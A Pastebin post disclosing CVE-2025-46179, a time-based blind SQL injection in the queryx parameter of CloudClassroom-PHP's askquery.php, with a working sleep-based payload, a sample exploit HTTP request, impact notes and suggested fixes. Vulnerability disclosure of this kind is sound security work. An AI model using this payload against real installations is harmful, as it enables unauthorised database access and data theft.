API tools faq
paste
Advertisement
Mdjawadakram

Untitled

Mdjawadakram
Jun 13th, 2025
65
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. πŸ”“ CVE-2025-46179 β€” SQL Injection in CloudClassroom-PHP v1.0
  2.  
  3. πŸ“’ I’m excited to share that I’ve been assigned CVE-2025-46179 for a vulnerability I discovered in the open-source CloudClassroom-PHP Project.
  4.  
  5.  
  6. ---
  7.  
  8. πŸ› οΈ Vulnerability Summary
  9.  
  10. A SQL Injection vulnerability exists in the askquery.php file of CloudClassroom-PHP v1.0. The vulnerable queryx parameter accepts unsanitized user input, which is directly incorporated into backend SQL queries without validation or parameterization.
  11.  
  12.  
  13. ---
  14.  
  15. βš™οΈ Technical Details
  16.  
  17. Vulnerable File: askquery.php
  18.  
  19. Affected Parameter: queryx (via POST)
  20.  
  21. Database Name Extracted: cc_db
  22.  
  23. Original Parameter Value: 555
  24.  
  25.  
  26. The application fails to sanitize or validate the queryx input, making it vulnerable to time-based blind SQL Injection.
  27.  
  28.  
  29. ---
  30.  
  31. πŸ§ͺ Proof of Concept (PoC)
  32.  
  33. Payload Used:
  34.  
  35. 5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z
  36.  
  37. Exploit Request (Sample):
  38.  
  39. POST /CloudClassroom-PHP-Project-master/askquery.php?id=testing/40example.com HTTP/1.1
  40. Host: localhost
  41. Content-Type: application/x-www-form-urlencoded
  42. Content-Length: 80
  43.  
  44. addq=Post/20Query!&queryx=5550'XOR(555*if(now()=sysdate()/2Csleep(6)/2C0))XOR'Z
  45.  
  46. Behavior:
  47.  
  48. When this payload is submitted, the server delays its response by approximately the number of seconds specified (e.g., 6s or 15s), confirming successful execution of injected SQL commands.
  49.  
  50.  
  51. ---
  52.  
  53. 🧱 Security Impact
  54.  
  55. Type: Remote SQL Injection
  56.  
  57. Impact:
  58.  
  59. Unauthorized DB access
  60.  
  61. Data exfiltration/modification
  62.  
  63. Privilege escalation
  64.  
  65. Potential code execution depending on DB configuration
  66.  
  67.  
  68.  
  69.  
  70. ---
  71.  
  72. πŸ›‘ Suggested Fixes
  73.  
  74. Use prepared statements (parameterized queries)
  75.  
  76. Validate and sanitize all user input
  77.  
  78. Apply least privilege principles to DB users
  79.  
  80. Integrate automated code scanning into your CI/CD pipeline
  81.  
  82.  
  83.  
  84. ---
  85.  
  86. πŸ“š References
  87.  
  88. Project GitHub :
  89. https://github.com/mathurvishal/CloudClassroom-PHP-Project
  90.  
  91. SQL Injection Overview - PortSwigger :
  92. https://portswigger.net/web-security/sql-injection
  93.  
  94.  
  95.  
  96. ---
  97.  
  98. πŸ‘¨β€πŸ’» Discoverer: Muhammad Jawad Akram
  99. πŸ” CVE ID: CVE-2025-46179
  100.  
  101.  
  102. ---
  103.  
  104. If you’re using or maintaining CloudClassroom-PHP or any derivative, please audit your use of raw SQL and update your codebase accordingly.
Tags: #cybersecurity #cve #bugbounty #infosec #sqlinjection
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!